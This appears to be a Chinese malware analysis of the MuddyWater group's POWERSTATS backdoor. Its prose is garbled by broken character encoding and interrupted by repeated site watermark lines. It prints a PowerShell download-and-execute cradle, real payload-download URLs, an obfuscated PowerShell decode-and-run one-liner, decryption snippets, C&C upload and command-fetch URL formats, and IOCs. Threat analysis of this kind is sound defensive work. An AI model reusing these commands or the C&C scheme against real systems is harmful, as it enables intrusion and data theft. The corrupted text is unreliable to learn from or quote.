APT×éÖ¯¡°MuddyWater£¨ÎÛË®£©¡±×îж¯ÏòÆÊÎö

Ðû²¼Ê±¼ä 2018-12-01
¡°MuddyWater£¨ÎÛË®£©¡±ÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖ÷ÒªÕë¶ÔÖж«µØÇø¹¥»÷µÄAPT×éÖ¯¡£¡£ ¡£¡£¡£¸Ã×éÖ¯Ö÷ҪʹÓÃPowershellÖ´ÐÐËùÓжñÒâ²Ù×÷£¬£¬£¬£¬£¬£¬£¬²¢ÔÚһϵÁÐÐж¯ÖÐÑÜÉú³öÁËËûÃǵÄרÓÐľÂí¡°POWERSTATS¡±¡£¡£ ¡£¡£¡£¸Ã×éÖ¯µÄ¹¥»÷Ä¿µÄÖ÷Òª¼¯ÖÐÓÚÕþ¸®£¬£¬£¬£¬£¬£¬£¬Í¨Ñ¶ÓëʯÓÍÕâЩÁìÓò¡£¡£ ¡£¡£¡£


ÔÚ¶ÔÒ»Ñùƽ³£Ñù±¾µÄ¸ú×ÙÖУ¬£¬£¬£¬£¬£¬£¬ÎÒÃÇ·¢Ã÷ÁËһЩеġ°MuddyWater¡±µÄÌØÖÖľÂí¡°POWERSTATS¡±£¬£¬£¬£¬£¬£¬£¬²¢»ù±¾È·¶¨ÕâЩÑù±¾ÎªMuddyWater×éÖ¯×îй¥»÷»î¶¯µÄ²úÆ·¡£¡£ ¡£¡£¡£


ÔØºÉÆÊÎö


×îй¥»÷ÈÔͨ¹ýÓʼþ;¾¶½ÓÄɶñÒâÎĵµµÄ·½·¨²¢ÅäºÏÉç»á¹¤³Ìѧ¾ÙÐÐͶ·Å¡£¡£ ¡£¡£¡£
 
¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨

¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨

Ïà¹ØÎĵµ¾ùǶÈëÁËÄ£ºýͼƬÒÔÒýÓÕÊܺ¦Õßµã»÷ÆôÓöñÒâºê´úÂ룬£¬£¬£¬£¬£¬£¬ÎĵµÖаüÀ¨µÄ¶ñÒâºê´úÂë»ùÄÚÇéËÆ£¬£¬£¬£¬£¬£¬£¬¶¼Ê¹ÓÃͳһÖÖËã·¨¾ÙÐÐÊý¾Ý½âÃÜ¡£¡£ ¡£¡£¡£Pyhton½âÃÜ´úÂëÈçÏ£º
¡°¡±.join([chr(int(data[_:_+3]) - KEY) for _ in range(0,len(data),3)])


Êý¾Ý½âÃÜÖ®ºóÖ÷ÒªÖ´ÐÐÈçÏÂpowershell´úÂ룺
powershell -exec bypass -c ""IEX((New-Object Net.WebClient).DownloadString(\'URL'))


Ïà¹ØÎĵµµÄÏÂÔØµÄÁ´½Ó»®·ÖÈçÏ£º
http://pazazta.com/app/icon[.]png
http://3cbc.net/dropbox/icon[.]icon
http://ohe.ie/cli/icon[.]png
http://ohe.ie/cp/icon[.]png


ÏÂÔØµÄÎļþ¾ùΪpowershell´úÂ룬£¬£¬£¬£¬£¬£¬Í¨¹ýʹÓÃpowershellÖ´ÐÐÕâЩÏÂÔØµÄ¹¥»÷ÔØºÉÀ´Ö´ÐÐÈç϶ñÒâ²Ù×÷£º


£¨1£©½«js±äÁ¿ÖеĴúÂëʹÓÃBase64±àÂë½âÂ룬£¬£¬£¬£¬£¬£¬²¢Ð´Èëµ½C:\Windows\Temp\temp.jpgÎļþÖС£¡£ ¡£¡£¡£


£¨2£©½«vbs±äÁ¿ÖдúÂëʹÓÃBase64±àÂë½âÂë²¢Óöþ½øÖÆÐÎʽдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖУ¬£¬£¬£¬£¬£¬£¬»òÕß½«vbs±äÁ¿ÖеÄÊý¾ÝÖ±½ÓÒÔ¶þ½øÖÆÐÎʽдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖС£¡£ ¡£¡£¡£


£¨3£©½«code±äÁ¿µÄÊý¾ÝÖ±½ÓдÈëµ½C:\ProgramData\Microsoft.dbÎļþÖС£¡£ ¡£¡£¡£


£¨4£©Æô¶¯C:\Windows\temp\Windows.vbe¡£¡£ ¡£¡£¡£


ÔÚÊͷŵÄÎļþÖУ¬£¬£¬£¬£¬£¬£¬Windows.vbe»áŲÓÃcscript.exeÀ´Ö´ÐÐC:\\Windows\\Temp\\temp.jpgÖеÄJavascript´úÂ룬£¬£¬£¬£¬£¬£¬¸Ã´úÂë¾­ÓÉ»ìÏý£¬£¬£¬£¬£¬£¬£¬½â¿ª»ìÏýÖ®ºóÎÒÃÇ·¢Ã÷¸Ã´úÂëÖ÷ÒªÖ´ÐÐÈçϵÄpowershell´úÂ룺
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\Microsoft.db);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));


¸Ã¶ÎPowershell´úÂëÓÃÓÚ½âÃÜMicrosoft.dbÖеÄÎļþ£¬£¬£¬£¬£¬£¬£¬²¢Ö´ÐнâÃܺóµÄ´úÂ룬£¬£¬£¬£¬£¬£¬½âÃܺóµÄpowershell»áÔٴνâÃÜÒ»¶ÎÊý¾Ý£¬£¬£¬£¬£¬£¬£¬¸ÃÊý¾ÝÏÈʹÓÃBase64½âÂ룬£¬£¬£¬£¬£¬£¬È»ºóÔÙ¶ÔÊý¾ÝʹÓýâѹËã·¨¾ÙÐнâѹ£¬£¬£¬£¬£¬£¬£¬»ñµÃÒ»¶Î¾­ÓÉ´ó×Ú»ìÏýµÄpowershell´úÂ룬£¬£¬£¬£¬£¬£¬»ìÏýÒªÁì»ù±¾ÒÀÀµ×Ö·û»»Ìæ»»£¬£¬£¬£¬£¬£¬£¬µ¹ÐòµÈ·½·¨£¬£¬£¬£¬£¬£¬£¬½â¿ª»ìÏýºóΪ¸Ã×é֯רÓÐÌØÖÖľÂí¡°POWERSTATS¡±¡£¡£ ¡£¡£¡£


POWERSTATSľÂíÆÊÎö


POWERSTATSľÂíÊ×ÏÈ»áÉèÖÃһϵÁÐ×¢²á±íÏîÄ¿£¬£¬£¬£¬£¬£¬£¬À´½ûÓÃOfficeºêÖÒÑԺͱ£»£»£»£» £»£»£»¤ÊÓͼ¡£¡£ ¡£¡£¡£ÕâÊÇΪÁËÈ·±£Î´À´µÄ¹¥»÷²»ÐèÒªÓû§½»»¥¡£¡£ ¡£¡£¡£ÉõÖÁ»¹ÔÊÐíºê´úÂë»á¼ûÄÚ²¿VBA¹¤¾ß£¬£¬£¬£¬£¬£¬£¬ÒÔ±ãÔÚδÀ´µÄ¹¥»÷ÖÐÖ´ÐиüÒþ²ØµÄºê´úÂ룬£¬£¬£¬£¬£¬£¬Í¬Ê±½«
¡°C:\windows\system32\wscript.exeC:\Windows\temp\Windows.vbe¡±Ð´Èëµ½¿ª»ú×ÔÆôÏîMicrosoft EdgeÖУ¬£¬£¬£¬£¬£¬£¬È»ºóÉèÖÃÁËÒ»¸öÃûΪMicrosoft EdgeµÄ׼ʱʹÃüÀ´×¼Ê±Å²ÓÃwscript.exeÖ´ÐÐWindows.vbe£¬£¬£¬£¬£¬£¬£¬ÒÔ±ã°ü¹Ü¸Ã¶ñÒâ³ÌÐòÔÚϵͳÖеÄפÁôÓë׼ʱÔËÐС£¡£ ¡£¡£¡£


Ö®ºóPOWERSTATS½«Ö´ÐнÓÏÂÀ´µÄһϵÁжñÒâÐÐΪ£¬£¬£¬£¬£¬£¬£¬Ê×ÏÈPOWERSTATSľÂí»á´Ó×Ô¼ºÉèÖõÄÈý¸ö¼ÓÃܵÄÊý¾ÝÖÐËæ»ú³éѡһ¸ö¾ÙÐнâÃÜ£¬£¬£¬£¬£¬£¬£¬½âÃܳöÀ´ÎªÐèÒª¾ÙÐн»»¥µÄC&CЧÀÍÆ÷µØµã£¬£¬£¬£¬£¬£¬£¬½âÃÜËã·¨ÈçÏÂ(Python)£º
"".join([chr(ord(a[_%len(KEY)])^ord(DecryptByBase64(Data)[_])) for _ in xrange(len(DecryptByBase64(Data)))])


½âÃܺóµÄC&CÈçÏÂ

¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


   ½Ó×Å£¬£¬£¬£¬£¬£¬£¬»á»ñȡһϵÁÐÓû§Êý¾Ý£¬£¬£¬£¬£¬£¬£¬Ê¹Óá±**¡±Æ´½Óµ½Ò»ÆðʹÓÃUTF-8±àÂ룬£¬£¬£¬£¬£¬£¬È»ºóÔÙÅÌËã³öMD5Öµ£¬£¬£¬£¬£¬£¬£¬×÷Ϊ´Ë´ÎµÄ»ñÈ¡µ½µÄÊý¾ÝµÄΨһ±êʶ£¬£¬£¬£¬£¬£¬£¬×îÖսṹÈçÏÂURL£º
[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=info&id=global_key
È»ºó½«Ö®Ç°»ñÈ¡µ½µÄÓû§Êý¾Ý¾ÙÐÐÉÏ´«£¬£¬£¬£¬£¬£¬£¬ÉÏ´«µÄÊý¾Ý¾­ÓɼÓÃÜ£¬£¬£¬£¬£¬£¬£¬¼ÓÃÜËã·¨µÄÈçÏ£º
 

¸ÃËã·¨¶Ôÿ¸ö×Ö·û¾ÙÐмÓÃÜ£¬£¬£¬£¬£¬£¬£¬ÕâÖÖ·½·¨µÄ¼ÓÃÜ×Ö·û»ù±¾²»±£´æ¿ÉÄæµÄÇéÐΣ¬£¬£¬£¬£¬£¬£¬¿ÉÊǵ¥¸ö×Ö·û´®Ê¹ÓÃËã·¨»ñµÃµÄ¼ÓÃÜ×Ö·û×ÅʵÊÇÏàͬµÄ£¬£¬£¬£¬£¬£¬£¬ÎÒÒÔΪЧÀÍÆ÷±£´æÒ»ÕÅ×Ö½ÚÌæ»»±íÀ´Ì滻ÿ¸ö¼ÓÃܺóµÄÊý¾Ý£¬£¬£¬£¬£¬£¬£¬ÔÚµÚÒ»´Î½«Êý¾ÝÉÏ´«Ö®ºó£¬£¬£¬£¬£¬£¬£¬ÈôÊÇЧÀÍÆ÷·µ»Ø¡°OK¡±ÌåÏÖ׼ȷÎüÊÕÊý¾Ý£¬£¬£¬£¬£¬£¬£¬È»ºóÔÙÌìÉú20¸öËæ»ú×Ö·û£¬£¬£¬£¬£¬£¬£¬¾­ÓÉMD5¼ÓÃÜÖ®ºó£¬£¬£¬£¬£¬£¬£¬ÒÔÈçϵÄURLÃûÌ÷¢ËÍPOSTÇëÇ󣬣¬£¬£¬£¬£¬£¬·¢Ë͵ÄÊý¾ÝÎªËæ»úÌìÉúµÄ20¸ö×Ö·û£¬£¬£¬£¬£¬£¬£¬À´Åú×¢¿ÉÒÔ¾ÙÐÐÏÂÒ»²½²Ù×÷¡£¡£ ¡£¡£¡£


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=live&id=global_key
ÈôÊÇЧÀÍÆ÷·µ»ØOKÔòÌåÏÖ¿ÉÒÔ¾ÙÐнÓÏÂÀ´µÄ²Ù×÷£¬£¬£¬£¬£¬£¬£¬È»ºó¶ñÒâ³ÌÐò»áÏòЧÀÍÆ÷¾ÙÐÐÈçϵÄGETÇëÇó


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=g&type=cmd&id=global_key¡£¡£ ¡£¡£¡£


ÈôÊÇЧÀÍÆ÷׼ȷÏìÓ¦£¬£¬£¬£¬£¬£¬£¬Æä·µ»ØµÄÊý¾ÝÃûÌÃÈçÏ£º[ID]"~~!!~~"[Operand][Data]


ÆäÖвî±ðµÄ²Ù×÷Âë»áÓвî±ðµÄ¹¦Ð§£¬£¬£¬£¬£¬£¬£¬¶ÔÓ¦ÈçÏ£º

¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


Ö´ÐÐÍê¶ÔÓ¦µÄ¹¦Ð§Ö®ºó£¬£¬£¬£¬£¬£¬£¬½«·µ»ØÖµ¾ÙÐÐBase64¾ÙÐбàÂëÈ»ºóÒÔÈçϵÄÃûÌý«Êý¾ÝÉÏ´«
[ID]:[Result]


Óë֮ǰ¹¥»÷µÄ¹ØÁª


ÔÚÓë½ñÄê10ÔÂÅû¶µÄMuddyWaterµÄ¹¥»÷Ñù±¾±ÈÕÕºóÎÒÃÇ·¢Ã÷£¬£¬£¬£¬£¬£¬£¬×îºóÖ´ÐÐÕæÕý¶ñÒâÐÐΪµÄPosershell´úÂëÓë±¾´ÎµÄ´úÂë»ù±¾Ò»Ö£¬£¬£¬£¬£¬£¬£¬°üÀ¨Æä½âÃÜURLµÄËã·¨Óëkey£¬£¬£¬£¬£¬£¬£¬JavascriptÖнâÃÜPowershell´úÂëµÄËã·¨£¬£¬£¬£¬£¬£¬£¬ÓëC&C½»»¥µÄÖ¸ÁЧµÈ¡£¡£ ¡£¡£¡£ÎÒÃÇÐγÉÈçϱÈÕÕ±í¡£¡£ ¡£¡£¡£
 
¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨



¿ÉÒÔ·¢Ã÷¸Ã×éÖ¯ÔÚ±¾´Î¹¥»÷ÖÐÖ÷Òª¸ÄÉÆÁËһЩ×îÖÕpowershell´úÂëµÄŲÓÃÀú³Ì£¬£¬£¬£¬£¬£¬£¬Èøü¶àµÄ¹¥»÷ÔØºÉǨáãµ½C&CЧÀÍÆ÷ÖУ¬£¬£¬£¬£¬£¬£¬ÕâÑùʹºóÐøµÄ²Ù×÷±äµÃÔ½·¢ÎÞаºÍ³¤ÆÚ¡£¡£ ¡£¡£¡£


Ïà¹ØIOC£º
5935522717aee842433a5de9d228a715
ca9230a54f40a6a0fe52d7379459189c
0cf25597343240f88358c694d7ae7e0a
a256abb5da891f109acf8a496d9792c4
hxxp://pazazta.com/app/icon[.]png
hxxp://3cbc.net/dropbox/icon[.]icon
hxxp://ohe.ie/cli/icon[.]png
hxxp://ohe.ie/cp/icon[.]png
C:\\ProgramData\\Microsoft.db
C:\\ProgramData\\Microsoft.vbe
C:\\Windows\\Temp\\temp.jpg